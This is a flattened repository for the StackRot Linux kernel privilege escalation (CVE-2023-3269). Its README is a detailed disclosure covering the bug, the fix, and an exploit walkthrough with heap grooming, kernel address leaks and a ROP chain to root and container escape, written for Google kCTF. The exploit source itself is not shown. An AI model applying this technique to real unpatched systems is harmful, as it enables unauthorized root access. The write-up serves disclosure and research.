├── .github
│   └── workflows
│       └── ci.yml
├── README.md
├── env
│   ├── .gitignore
│   ├── README.md
│   ├── bzImage_upstream_6.1.25
│   ├── bzImage_upstream_6.1.25_config
│   ├── exp
│   │   ├── as_root.sh
│   │   └── exploit.sh
│   └── initramfs.cpio.gz
├── exp
│   ├── .clang-format
│   ├── Makefile
│   ├── README.md
│   ├── consts
│   │   ├── log.h
│   │   ├── msg.h
│   │   ├── paging.h
│   │   ├── prog_regions.h
│   │   └── stack.h
│   ├── linkscript.lds
│   ├── nolibc
│   │   ├── Makefile
│   │   ├── arch-aarch64.h
│   │   ├── arch-arm.h
│   │   ├── arch-i386.h
│   │   ├── arch-mips.h
│   │   ├── arch-riscv.h
│   │   ├── arch-x86_64.h
│   │   ├── arch.h
│   │   ├── ctype.h
│   │   ├── errno.h
│   │   ├── nolibc.h
│   │   ├── signal.h
│   │   ├── std.h
│   │   ├── stdio.h
│   │   ├── stdlib.h
│   │   ├── string.h
│   │   ├── sys.h
│   │   ├── time.h
│   │   ├── types.h
│   │   └── unistd.h
│   ├── src
│   │   ├── main.c
│   │   ├── node_free.c
│   │   ├── node_master.c
│   │   ├── node_use.c
│   │   ├── nodes_decl.h
│   │   ├── nodes_free_and_use.h
│   │   ├── nodes_master_and_free.h
│   │   ├── nodes_master_and_use.h
│   │   └── nodes_master_free_use.h
│   ├── sys
│   │   ├── msg.h
│   │   └── uio.h
│   ├── sysutil
│   │   ├── clone.h
│   │   ├── mbarrier.h
│   │   └── pin_cpu.h
│   └── utils
│       └── string.h
└── pic
    ├── node_master_code_leak.png
    ├── node_master_fengshui.png
    ├── node_master_heap_leak.png
    ├── node_master_kern_exec.png
    └── nodes_free_and_use.png
/.github/workflows/ci.yml:
--------------------------------------------------------------------------------
 1 | name: CI
 2 | on:
 3 |   push:
 4 |     branches:
 5 |       - master
 6 |   pull_request:
 7 |     branches:
 8 |       - master
 9 | jobs:
10 |   ci:
11 |     runs-on: ubuntu-latest
12 |     defaults:
13 |       run:
14 |         working-directory: ./exp
15 |     steps:
16 |       - name: Checkout the repository
17 |         uses: actions/checkout@v3
18 |       - name: Check the code format
19 |         run: make check
20 |       - name: Build the exploit
21 |         run: make
22 |       - name: Install QEMU
23 |         run: sudo apt-get install -y qemu-system-x86
24 |       - name: Run the exploit
25 |         id: test
26 |         continue-on-error: true
27 |         run: make run KVM=
28 |       - name: Retry to run the exploit
29 |         if: steps.test.outcome == 'failure'
30 |         run: make run KVM=
31 | 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # StackRot (CVE-2023-3269): Linux kernel privilege escalation vulnerability 2 | 3 | [![GitHub CI](https://github.com/lrh2000/StackRot/actions/workflows/ci.yml/badge.svg)][ci] 4 | [*(GitHub-CI-verified exploit)*][ci] 5 | 6 | [ci]: https://github.com/lrh2000/StackRot/actions 7 | 8 | A flaw was found in the handling of stack expansion in the Linux kernel 6.1 9 | through 6.4, aka "Stack Rot". The maple tree, responsible for managing virtual 10 | memory areas, can undergo node replacement without properly acquiring the MM 11 | write lock, leading to use-after-free issues. An unprivileged local user could 12 | use this flaw to compromise the kernel and escalate their privileges. 13 | 14 | As StackRot is a Linux kernel vulnerability found in the memory management 15 | subsystem, it affects almost all kernel configurations and requires minimal 16 | capabilities to trigger. However, it should be noted that maple nodes are freed 17 | using RCU callbacks, delaying the actual memory deallocation until after the 18 | RCU grace period. Consequently, exploiting this vulnerability is considered 19 | challenging. 20 | 21 | To the best of my knowledge, there are currently no publicly available exploits 22 | targeting use-after-free-by-RCU (UAFBR) bugs. This marks the first instance 23 | where UAFBR bugs have been proven to be exploitable, even without the presence 24 | of CONFIG_PREEMPT or CONFIG_SLAB_MERGE_DEFAULT settings. Notably, this exploit 25 | has been successfully demonstrated in the environment provided by [Google kCTF 26 | VRP][ctf] ([bzImage_upstream_6.1.25][img], [config][cfg]). 
27 | 28 | [ctf]: https://google.github.io/kctf/vrp.html 29 | [img]: https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25 30 | [cfg]: https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25_config 31 | 32 | The StackRot vulnerability has been present in the Linux kernel since version 33 | 6.1 when the VMA tree structure was [changed][ch] from red-black trees to maple 34 | trees. 35 | 36 | [ch]: https://lore.kernel.org/lkml/20220906194824.2110408-1-Liam.Howlett@oracle.com/ 37 | 38 | ## Background 39 | 40 | Whenever the `mmap()` system call is utilized to establish a memory mapping, 41 | the kernel generates a structure called `vm_area_struct` to represent the 42 | corresponding virtual memory area (VMA). This structure stores various 43 | information including flags, properties, and other pertinent details related to 44 | the mapping. 45 | 46 | ```c 47 | struct vm_area_struct { 48 | long unsigned int vm_start; /* 0 8 */ 49 | long unsigned int vm_end; /* 8 8 */ 50 | struct mm_struct * vm_mm; /* 16 8 */ 51 | pgprot_t vm_page_prot; /* 24 8 */ 52 | long unsigned int vm_flags; /* 32 8 */ 53 | union { 54 | struct { 55 | struct rb_node rb __attribute__((__aligned__(8))); /* 40 24 */ 56 | /* --- cacheline 1 boundary (64 bytes) --- */ 57 | long unsigned int rb_subtree_last; /* 64 8 */ 58 | } __attribute__((__aligned__(8))) shared __attribute__((__aligned__(8))); /* 40 32 */ 59 | struct anon_vma_name * anon_name; /* 40 8 */ 60 | } __attribute__((__aligned__(8))); /* 40 32 */ 61 | /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */ 62 | struct list_head anon_vma_chain; /* 72 16 */ 63 | struct anon_vma * anon_vma; /* 88 8 */ 64 | const struct vm_operations_struct * vm_ops; /* 96 8 */ 65 | long unsigned int vm_pgoff; /* 104 8 */ 66 | struct file * vm_file; /* 112 8 */ 67 | void * vm_private_data; /* 120 8 */ 68 | /* --- cacheline 2 boundary (128 bytes) --- */ 69 | atomic_long_t swap_readahead_info; /* 128 8 */ 70 | struct 
vm_userfaultfd_ctx vm_userfaultfd_ctx; /* 136 0 */ 71 | 72 | /* size: 136, cachelines: 3, members: 14 */ 73 | /* forced alignments: 1 */ 74 | /* last cacheline: 8 bytes */ 75 | } __attribute__((__aligned__(8))); 76 | ``` 77 | 78 | Subsequently, when the kernel encounters page faults or other memory-related 79 | system calls, it requires fast lookup of the VMA solely based on the address. 80 | Previously, the VMAs were managed using red-black trees. However, starting from 81 | Linux kernel version 6.1, the migration to maple trees took place. [Maple 82 | trees][mt] are RCU-safe B-tree data structures optimized for storing 83 | non-overlapping ranges. Nonetheless, their intricate nature adds complexity to 84 | the codebase and introduces the StackRot vulnerability. 85 | 86 | [mt]: https://docs.kernel.org/6.4/core-api/maple_tree.html 87 | 88 | At its core, a maple tree is made up of maple nodes. While the tree's structure 89 | may be complex, it's important to note that this complexity has nothing to do 90 | with the StackRot bug. Therefore, throughout this article, it is assumed that 91 | the maple tree consists of only one node, i.e., the root node. 92 | 93 | This root node can contain up to 16 intervals. These intervals may either 94 | represent a gap or point to a VMA. As gaps also count as intervals, all 95 | intervals are connected sequentially, resulting in the need for only 15 96 | endpoints, also known as pivots, within the node's structure. Note that the 97 | leftmost endpoint and the rightmost endpoint are omitted, as they can be 98 | retrieved from the parent node. 
99 | 100 | ```c 101 | struct maple_range_64 { 102 | struct maple_pnode * parent; /* 0 8 */ 103 | long unsigned int pivot[15]; /* 8 120 */ 104 | /* --- cacheline 2 boundary (128 bytes) --- */ 105 | union { 106 | void * slot[16]; /* 128 128 */ 107 | struct { 108 | void * pad[15]; /* 128 120 */ 109 | /* --- cacheline 3 boundary (192 bytes) was 56 bytes ago --- */ 110 | struct maple_metadata meta; /* 248 2 */ 111 | }; /* 128 128 */ 112 | }; /* 128 128 */ 113 | 114 | /* size: 256, cachelines: 4, members: 3 */ 115 | }; 116 | ``` 117 | 118 | The `maple_range_64` structure, as shown above, represents a maple node. In 119 | addition to the pivots, the slots are used to refer to the VMA structure when 120 | the node functions as a leaf node, or to other maple nodes when the node 121 | functions as an interior node. If an interval corresponds to a gap, the slot 122 | will simply contain a NULL value. The arrangement of pivot points and slots can 123 | be visualized as illustrated below: 124 | 125 | ``` 126 | Slots -> | 0 | 1 | 2 | ... | 12 | 13 | 14 | 15 | 127 | ┬ ┬ ┬ ┬ ┬ ┬ ┬ ┬ ┬ 128 | │ │ │ │ │ │ │ │ └─ Implied maximum 129 | │ │ │ │ │ │ │ └─ Pivot 14 130 | │ │ │ │ │ │ └─ Pivot 13 131 | │ │ │ │ │ └─ Pivot 12 132 | │ │ │ │ └─ Pivot 11 133 | │ │ │ └─ Pivot 2 134 | │ │ └─ Pivot 1 135 | │ └─ Pivot 0 136 | └─ Implied minimum 137 | ``` 138 | 139 | Regarding concurrent modification, the maple tree imposes a specific 140 | restriction, that is, an exclusive lock must be held by writers (*Rule W*). In 141 | the case of the VMA tree, the exclusive lock corresponds to the MM write lock. 142 | As for readers, two options are available. The first option involves holding 143 | the MM read lock (*Rule A1*), which results in the writer being blocked by the 144 | MM read-write lock. Alternatively, the second option is to enter the RCU 145 | critical section (*Rule A2*). By doing so, the writer is not blocked, and 146 | readers can continue their operations since the maple tree is RCU-safe. 
While 147 | most existing VMA accesses opt for the first option (i.e., Rule A1), Rule A2 is 148 | employed in a few performance-critical scenarios, such as lockless page faults. 149 | 150 | However, there is an additional aspect that requires particular attention, 151 | which pertains to stack expansion. The stack represents a memory area that is 152 | mapped with the MAP_GROWSDOWN flag, indicating automatic expansion when an 153 | address below the region is accessed. In such cases, the start address of the 154 | corresponding VMA is adjusted, as well as the associated interval within the 155 | maple tree. Notably, these adjustments are made without holding the MM write 156 | lock. 157 | 158 | ```c 159 | static inline 160 | void do_user_addr_fault(struct pt_regs *regs, 161 | unsigned long error_code, 162 | unsigned long address) 163 | { 164 | // ... 165 | 166 | if (unlikely(!mmap_read_trylock(mm))) { 167 | // ... 168 | } 169 | // ... 170 | if (unlikely(expand_stack(vma, address))) { 171 | // ... 172 | } 173 | 174 | // ... 175 | } 176 | ``` 177 | 178 | Typically, a gap exists between the stack VMA and its neighboring VMA, as the 179 | kernel enforces a stack guard. In this scenario, when expanding the stack, only 180 | the pivot value in the maple node needs updating, a process that can be 181 | performed atomically. However, if the neighboring VMA also possesses the 182 | MAP_GROWSDOWN flag, no stack guard is enforced. 183 | 184 | ```c 185 | int expand_downwards(struct vm_area_struct *vma, unsigned long address) 186 | { 187 | // ... 188 | 189 | if (prev) { 190 | if (!(prev->vm_flags & VM_GROWSDOWN) && 191 | vma_is_accessible(prev) && 192 | (address - prev->vm_end < stack_guard_gap)) 193 | return -ENOMEM; 194 | } 195 | 196 | // ... 197 | } 198 | ``` 199 | 200 | As a result, the stack expansion can eliminate the gap. In such situations, the 201 | gap interval within the maple node must be removed. 
As the maple tree is 202 | RCU-safe, overwriting the node in-place is not possible. Instead, a new node is 203 | created, triggering node replacement, and the old node is subsequently 204 | destroyed using an RCU callback. 205 | 206 | ```c 207 | static inline void mas_wr_modify(struct ma_wr_state *wr_mas) 208 | { 209 | // ... 210 | 211 | if ((wr_mas->offset_end - mas->offset <= 1) && 212 | mas_wr_slot_store(wr_mas)) // <-- in-place update 213 | return; 214 | else if (mas_wr_node_store(wr_mas)) // <-- node replacement 215 | return; 216 | 217 | // ... 218 | } 219 | ``` 220 | 221 | The RCU callback is invoked only after all pre-existing RCU critical sections 222 | have concluded. However, the issue arises when accessing VMAs, as only the MM 223 | read lock is held, and it does not enter the RCU critical section (according to 224 | Rule A1). Consequently, in theory, the callback could be invoked at any time, 225 | resulting in the freeing of the old maple node. Meanwhile, pointers to the old 226 | node may have already been fetched, leading to a use-after-free bug when 227 | attempting subsequent access to it. 228 | 229 | The backtrace where use-after-free (UAF) occurs is shown below: 230 | 231 | ``` 232 | - CPU 0 - - CPU 1 - 233 | 234 | mm_read_lock() mm_read_lock() 235 | expand_stack() find_vma_prev() 236 | expand_downwards() mas_walk() 237 | mas_store_prealloc() mas_state_walk() 238 | mas_wr_store_entry() mas_start() 239 | mas_wr_modify() mas_root() 240 | mas_wr_node_store() node = rcu_dereference_check() 241 | mas_replace() [ The node pointer is recorded ] 242 | mas_free() 243 | ma_free_rcu() 244 | call_rcu(&mt_free_rcu) 245 | [ The node is dead ] 246 | mm_read_unlock() 247 | 248 | [ Wait for the next RCU grace period.. ] 249 | rcu_do_batch() mas_prev() 250 | mt_free_rcu() mas_prev_entry() 251 | kmem_cache_free() mas_prev_nentry() 252 | [ The node is freed ] mas_slot() 253 | mt_slot() 254 | rcu_dereference_check(node->..) 
255 | [ UAF occurs here ] 256 | mm_read_unlock() 257 | ``` 258 | 259 | ## Fix 260 | 261 | I reported this vulnerability to the Linux kernel security team on June 15th. 262 | Following that, the process of addressing this bug was led by Linus Torvalds. 263 | Given its complexity, it took nearly two weeks to develop a set of patches that 264 | received consensus. 265 | 266 | On June 28th, during the merge window for Linux kernel 6.5, the fix was merged 267 | into Linus' tree. Linus provided a [comprehensive merge message][fix] to 268 | elucidate the patch series from a technical perspective. 269 | 270 | [fix]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9471f1f2f50282b9e8f59198ec6bb738b4ccc009 271 | 272 | These patches were subsequently backported to stable kernels ([6.1.37][6.1], 273 | [6.3.11][6.3], and [6.4.1][6.4]), effectively resolving the "Stack Rot" bug on 274 | July 1st. 275 | 276 | [6.1]: https://lore.kernel.org/stable/2023070133-create-stainless-9a8c@gregkh/T/ 277 | [6.3]: https://lore.kernel.org/stable/2023070146-endearing-bounding-d21a@gregkh/T/ 278 | [6.4]: https://lore.kernel.org/stable/2023070140-eldercare-landlord-133c@gregkh/T/ 279 | 280 | ## Exploit 281 | 282 | The exploit primarily focuses on the Google kCTF challenge, specifically when 283 | neither CONFIG_PREEMPT nor CONFIG_SLAB_MERGE_DEFAULT is set. To exploit 284 | StackRot, the most important task is to locate a VMA iteration that fulfills 285 | the following criteria: 286 | 1. The iteration's timing can be controlled. This control allows us to ensure 287 | that the RCU grace period concludes during the VMA iteration. 288 | 2. The iteration retrieves specific information from the VMA structure, and 289 | returns the information to the userspace. This feature enables us to 290 | exploit the UAF vulnerability of the maple node to leak some kernel 291 | addresses. 292 | 3. The iteration invokes certain function pointers in the VMA structure. 
This 293 | particular capability allows us to exploit the UAF of the maple node to 294 | control the kernel-mode program counter (PC). 295 | 296 | The chosen VMA iteration is the iteration responsible for generating the 297 | contents of `/proc/[pid]/maps`. The following sections will show how this 298 | iteration satisfies the above criteria. 299 | 300 | ### Step 0: From UAFBR to UAF 301 | 302 | During any VMA iteration, the reference to the root node of the VMA tree is 303 | obtained, and the iteration proceeds through its slots. Thus, by triggering 304 | stack expansion in another thread on a separate CPU during the VMA iteration, 305 | the node replacement can be concurrently initiated. At this point, accessing 306 | the old node is considered a use-after-free-by-RCU (UAFBR) situation. However, 307 | actual issues arise only when the old node is truly freed, which occurs in the 308 | RCU callback. 309 | 310 | This presents two challenges: (i) determining when the old node is freed and 311 | (ii) ensuring that the VMA iteration does not complete before the old node is 312 | freed. 313 | 314 | The first question is relatively straightforward. In the kernel, the 315 | `synchronize_rcu()` function can be employed to wait until the RCU grace period 316 | concludes, ensuring that all pre-existing RCU callbacks have been invoked. In 317 | userspace, system calls that ultimately call `synchronize_rcu()` can be 318 | utilized for the same purpose. Thus, when such system calls terminate, it is 319 | known that the old node has been freed. Notably, there is a system call, 320 | `membarrier(MEMBARRIER_CMD_GLOBAL, 0, -1)`, that solely invokes 321 | `synchronize_rcu()`. 322 | 323 | ```c 324 | SYSCALL_DEFINE3(membarrier, int, cmd, unsigned int, flags, int, cpu_id) 325 | { 326 | // ... 327 | 328 | switch (cmd) { 329 | // ... 330 | case MEMBARRIER_CMD_GLOBAL: 331 | /* MEMBARRIER_CMD_GLOBAL is not compatible with nohz_full. 
*/ 332 | if (tick_nohz_full_enabled()) 333 | return -EINVAL; 334 | if (num_online_cpus() > 1) 335 | synchronize_rcu(); 336 | return 0; 337 | // ... 338 | } 339 | } 340 | ``` 341 | 342 | The second question necessitates further consideration. Several potential 343 | solutions are as follows: 344 | 1. The iteration task gets preempted, the RCU grace period ends, and the 345 | iteration resumes execution. However, this approach is ineffective if 346 | CONFIG_PREEMPT is not set. 347 | 2. The iteration task enters a sleep state (e.g., waiting for I/O), the RCU 348 | grace period ends, and the iteration continues. Currently, I am unaware of 349 | any VMA iteration that satisfies this requirement and can be exploited to 350 | leak kernel addresses and control the program counter (PC). It may exist, 351 | but a thorough investigation is required. 352 | 3. The iteration task experiences an interruption (e.g., timer interrupt), 353 | during which the RCU grace period concludes. It is possible to employ 354 | timerfd to create multiple hardware timers that, upon timeout during the 355 | VMA iteration, can trigger a lengthy interrupt. However, this approach is 356 | not viable because the interrupt handler operates with interrupts disabled, 357 | and if a CPU cannot handle inter-processor interrupts (IPIs), the RCU grace 358 | period will not end. 359 | 4. The iteration task is deliberately prolonged, allowing the RCU grace period 360 | to expire. This is the chosen solution. If the current RCU grace period 361 | surpasses RCU_TASK_IPI_DELAY (defaulting to 0.5 seconds), inter-processor 362 | interrupts (IPIs) are dispatched to all CPUs to verify that they are not in 363 | RCU critical sections. In the case of VMA iteration, the answer is 364 | negative, signifying that the RCU grace period concludes and the maple node 365 | is freed, effectively converting UAFBR into a genuine use-after-free (UAF) 366 | scenario. 
367 | 368 | One significant observation is that the VMA iteration for 369 | `/proc/[pid]/maps` generates the entire file path for file-mapped memory 370 | regions. Although each directory name is typically restricted to a maximum of 371 | 255 characters, there is no limitation on the directory depth. This means that 372 | by creating a file with an exceedingly large directory depth and establishing a 373 | memory mapping for this file, accessing `/proc/[pid]/maps` can take a 374 | considerable amount of time during the VMA iteration. Consequently, this 375 | extended duration enables the possibility of concluding the RCU grace period 376 | and acquiring the UAF primitive. 377 | 378 | ```c 379 | static void 380 | show_map_vma(struct seq_file *m, struct vm_area_struct *vma) 381 | { 382 | // ... 383 | 384 | /* 385 | * Print the dentry name for named mappings, and a 386 | * special [heap] marker for the heap: 387 | */ 388 | if (file) { 389 | seq_pad(m, ' '); 390 | /* 391 | * If user named this anon shared memory via 392 | * prctl(PR_SET_VMA ..., use the provided name. 393 | */ 394 | if (anon_name) 395 | seq_printf(m, "[anon_shmem:%s]", anon_name->name); 396 | else 397 | seq_file_path(m, file, "\n"); 398 | goto done; 399 | } 400 | 401 | // ... 402 | } 403 | ``` 404 | 405 | This step is illustrated in the following figure: 406 | 407 | ![Step 0: From UAFBR to UAF](pic/nodes_free_and_use.png) 408 | 409 | ### Step 1: From slab UAF to page UAF 410 | 411 | At this point, the UAF resides within a slab. If CONFIG_SLAB_MERGE_DEFAULT is 412 | enabled and the slab of maple nodes merges with kmalloc-256, the contents 413 | within the old node can be controlled by allocating a new structure from 414 | kmalloc-256 and populating it with userspace data. However, if 415 | CONFIG_SLAB_MERGE_DEFAULT is not set, an alternative approach is required. 
In 416 | this case, one needs to return the page of the freed node to the page 417 | allocator, allowing the old node to be controlled by allocating a new page and 418 | filling it accordingly. 419 | 420 | Recall that the VMA tree will only contain one node. Hence, by utilizing 421 | `fork()`/`clone()`, multiple VMA trees and an equal number of maple nodes are 422 | generated. Assuming one slab encompasses M maple nodes, and one node per M 423 | nodes is retained while all other nodes are freed via `exit()`, the remaining 424 | nodes become the sole nodes within their respective slabs. Initially, these 425 | slabs reside in the CPU's partial list. When the partial list reaches its 426 | capacity, the slabs are flushed back to the partial list of the corresponding 427 | NUMA node. 428 | 429 | If the last maple node within a slab is freed, the slab becomes empty. If this 430 | slab resides in the partial list of a NUMA node, and the partial list of that 431 | particular NUMA node is already at maximum capacity, the page is immediately 432 | returned to the page allocator. Consequently, the slab UAF transforms into a 433 | page UAF scenario. The contents within the freed page can be manipulated by 434 | sending some data via `msgsnd()`, which allocates elastic objects and directly 435 | populates them with the provided user data. 436 | 437 | ```c 438 | static void __slab_free(struct kmem_cache *s, struct slab *slab, 439 | void *head, void *tail, int cnt, 440 | unsigned long addr) 441 | 442 | { 443 | // ... 444 | 445 | if (unlikely(!new.inuse && n->nr_partial >= s->min_partial)) 446 | goto slab_empty; 447 | 448 | // ... 449 | return; 450 | 451 | slab_empty: 452 | // ... 453 | discard_slab(s, slab); 454 | } 455 | ``` 456 | 457 | The number of maple nodes per slab, M, depends on the number of CPUs. 
The 458 | exploit implementation considers a situation with two CPUs and therefore 459 | assumes 16 as the value of M, as illustrated in the following figure: 460 | 461 | ![Step 1: From slab UAF to page UAF](pic/node_master_fengshui.png) 462 | 463 | ### Step 2: From UAF to address leaking 464 | 465 | Upon gaining control of the maple node, it becomes possible to manipulate the 466 | addresses of subsequent VMAs that will be later iterated. As the targeted 467 | iteration is aimed at generating `/proc/self/maps`, certain VMA information, 468 | such as the start and end addresses, which reside within the VMA structure, are 469 | returned to the user space. 470 | 471 | However, a challenge arises: the address of a VMA structure in the maple node 472 | can only be appropriately set if some addresses are already known. Fortunately, 473 | CVE-2023-0597 directly serves this purpose. According to CVE-2023-0597, the 474 | address of `cpu_entry_area` is not randomized. Although this vulnerability has 475 | been patched in Linux 6.2, it has not been backported to earlier stable kernels 476 | as of the time of writing. Consequently, by overwriting the address of the VMA 477 | structure with that of the last IDT entry, the entry that contains the address 478 | of `asm_sysvec_spurious_apic_interrupt` is directly leaked, thereby revealing 479 | the base addresses of the kernel code and kernel data. 480 | 481 | ![Step 2: From UAF to address leaking (1)](pic/node_master_code_leak.png) 482 | 483 | The previously discussed method can be used recurrently to incrementally expose 484 | more addresses from the kernel data section. For instance, the 485 | `init_task.tasks.prev` pointer within the data section directs to the 486 | `task_struct` structure of the latest created task, which is without question 487 | allocated on the heap. 
488 | 489 | ![Step 2: From UAF to address leaking (2)](pic/node_master_heap_leak.png) 490 | 491 | When all newly established tasks are terminated, their `task_struct` structures 492 | will subsequently be deallocated. If the quantity of these tasks is large 493 | enough, the corresponding pages can be surrendered back to the page allocator. 494 | This allows for the possibility to reallocate these pages and fill them with 495 | user data. However, keep in mind that the released pages generally belong to 496 | the per-cpu page (PCP) list. For pages present in the PCP list, they can be 497 | reallocated exclusively in the same page order. Consequently, solely mapping 498 | new pages into the user space, which requires only order-0 pages from the page 499 | allocator, won't fulfill the objectives. 500 | 501 | Nonetheless, the msgsnd system call will solicit memory chunks via kmalloc and 502 | populate these chunks with user-defined data. When the kmalloc cache is 503 | exhausted, it will requisition pages from the page allocator at a specific 504 | order. If the message size is accurately adjusted, the exact order will be 505 | desired. Thus, the page whose address has been previously leaked will be 506 | reallocated. As a result, it becomes possible to obtain a page with a known 507 | address and user-manipulated data. 508 | 509 | ### Step 3: From UAF to root privileges 510 | 511 | It is now possible to forge the VMA structure in the address-known page and 512 | control the `vma->vm_ops->name` function pointer. The next step involves 513 | finding suitable gadgets to escape containers and acquire root privileges. 514 | 515 | ```c 516 | static void 517 | show_map_vma(struct seq_file *m, struct vm_area_struct *vma) 518 | { 519 | // ... 520 | 521 | if (vma->vm_ops && vma->vm_ops->name) { 522 | name = vma->vm_ops->name(vma); 523 | if (name) 524 | goto done; 525 | } 526 | 527 | // ... 
528 | } 529 | ``` 530 | 531 | ![Step 3: From UAF to root privileges](pic/node_master_kern_exec.png) 532 | 533 | The gadget constructions are as follows: 534 | 1. Stack pivot: `movq %rbx, %rsi; movq %rbp, %rdi; call 535 | __x86_indirect_thunk_r13` -> `pushq %rsi; jmp 46(%rsi)` -> `popq %rsp; ret` 536 | -> `popq %rsp; ret`, where %rdi, %rbx, and %r13 _initially_ point to 537 | user-controllable data. 538 | 2. Gain root privileges: `popq %rdi; ret` -> `prepare_kernel_cred` -> `popq 539 | %rdi; ret` -> `movq %rax, (%rdi); ret`, where %rdi _now_ points to the 540 | stack top; `popq %rdi; ret` -> `commit_creds`, effectively executing 541 | `commit_creds(prepare_kernel_cred(&init_task))`. 542 | 3. Escape containers: `popq %rdi; ret` -> `find_task_by_vpid` -> `popq %rdi; 543 | ret` -> `movq %rax, (%rdi); ret`, where %rdi _now_ points to the stack top; 544 | `popq %rdi; ret` -> `popq %rsi; ret` -> `switch_task_namespaces`, 545 | effectively performing `switch_task_namespaces(find_task_by_vpid(1), 546 | &init_nsproxy)`. 547 | 4. Unlock mm: `popq %rax; ret` -> `movq %rbp, %rdi; call 548 | __x86_indirect_thunk_rax`, where %rbp points to the original seq_file; 549 | `popq %rax; ret` -> `m_stop`, effectively executing `m_stop(seq_file, ..)`. 550 | 5. Return to userspace: use `swapgs_restore_regs_and_return_to_usermode`, and 551 | call `execve()` to get the shell. 552 | 553 | Finally, use `nsenter --mount=/proc/1/ns/mnt` to restore the mount namespace 554 | and get the flag via `cat /flag/flag`. 555 | 556 | ### Source code 557 | 558 | The full exploit source is available [here](/exp). For more details, refer to 559 | its README file. 
560 | -------------------------------------------------------------------------------- /env/.gitignore: -------------------------------------------------------------------------------- 1 | exp/exploit 2 | run.out 3 | -------------------------------------------------------------------------------- /env/README.md: -------------------------------------------------------------------------------- 1 | # Linux kernel 6.1.25 2 | 3 | Here is the Linux kernel image and config used in the [Google kCTF VRP][ctf] 4 | challenge. 5 | 6 | [ctf]: https://google.github.io/kctf/vrp.html 7 | 8 | File information: 9 | - `bzImage_upstream_6.1.25` was downloaded from: 10 | - https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25 11 | - `bzImage_upstream_6.1.25_config` was downloaded from: 12 | - https://storage.googleapis.com/kctf-vrp-public-files/bzImage_upstream_6.1.25_config 13 | - `initramfs.cpio.gz` was built from scratch because Google kCTF VRP does not 14 | provide the disk image it uses. 
15 | -------------------------------------------------------------------------------- /env/bzImage_upstream_6.1.25: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/env/bzImage_upstream_6.1.25 -------------------------------------------------------------------------------- /env/exp/as_root.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | export PATH=/bin:/usr/bin:/sbin:$PATH 4 | 5 | set -v 6 | 7 | whoami 8 | 9 | ls -al /root 10 | cat /root/flag 11 | 12 | poweroff -f 13 | -------------------------------------------------------------------------------- /env/exp/exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -v 4 | 5 | whoami 6 | 7 | ls -al /root 8 | cat /root/flag 9 | 10 | exec $(dirname $0)/exploit 11 | -------------------------------------------------------------------------------- /env/initramfs.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lrh2000/StackRot/c50978a5730745f4fea1e02313242177a4f6bd9f/env/initramfs.cpio.gz -------------------------------------------------------------------------------- /exp/.clang-format: -------------------------------------------------------------------------------- 1 | # SPDX-License-Identifier: GPL-2.0 2 | # 3 | # clang-format configuration file. Intended for clang-format >= 11. 
4 | # 5 | # For more information, see: 6 | # 7 | # Documentation/process/clang-format.rst 8 | # https://clang.llvm.org/docs/ClangFormat.html 9 | # https://clang.llvm.org/docs/ClangFormatStyleOptions.html 10 | # 11 | --- 12 | AccessModifierOffset: -4 13 | AlignAfterOpenBracket: Align 14 | AlignConsecutiveAssignments: false 15 | AlignConsecutiveDeclarations: false 16 | AlignEscapedNewlines: Left 17 | AlignOperands: true 18 | AlignTrailingComments: false 19 | AllowAllParametersOfDeclarationOnNextLine: false 20 | AllowShortBlocksOnASingleLine: false 21 | AllowShortCaseLabelsOnASingleLine: false 22 | AllowShortFunctionsOnASingleLine: None 23 | AllowShortIfStatementsOnASingleLine: false 24 | AllowShortLoopsOnASingleLine: false 25 | AlwaysBreakAfterDefinitionReturnType: None 26 | AlwaysBreakAfterReturnType: None 27 | AlwaysBreakBeforeMultilineStrings: false 28 | AlwaysBreakTemplateDeclarations: false 29 | BinPackArguments: true 30 | BinPackParameters: true 31 | BraceWrapping: 32 | AfterClass: false 33 | AfterControlStatement: false 34 | AfterEnum: false 35 | AfterFunction: true 36 | AfterNamespace: true 37 | AfterObjCDeclaration: false 38 | AfterStruct: false 39 | AfterUnion: false 40 | AfterExternBlock: false 41 | BeforeCatch: false 42 | BeforeElse: false 43 | IndentBraces: false 44 | SplitEmptyFunction: true 45 | SplitEmptyRecord: true 46 | SplitEmptyNamespace: true 47 | BreakBeforeBinaryOperators: None 48 | BreakBeforeBraces: Custom 49 | BreakBeforeInheritanceComma: false 50 | BreakBeforeTernaryOperators: false 51 | BreakConstructorInitializersBeforeComma: false 52 | BreakConstructorInitializers: BeforeComma 53 | BreakAfterJavaFieldAnnotations: false 54 | BreakStringLiterals: false 55 | ColumnLimit: 80 56 | CommentPragmas: '^ IWYU pragma:' 57 | CompactNamespaces: false 58 | ConstructorInitializerAllOnOneLineOrOnePerLine: false 59 | ConstructorInitializerIndentWidth: 8 60 | ContinuationIndentWidth: 8 61 | Cpp11BracedListStyle: false 62 | DerivePointerAlignment: false 63 
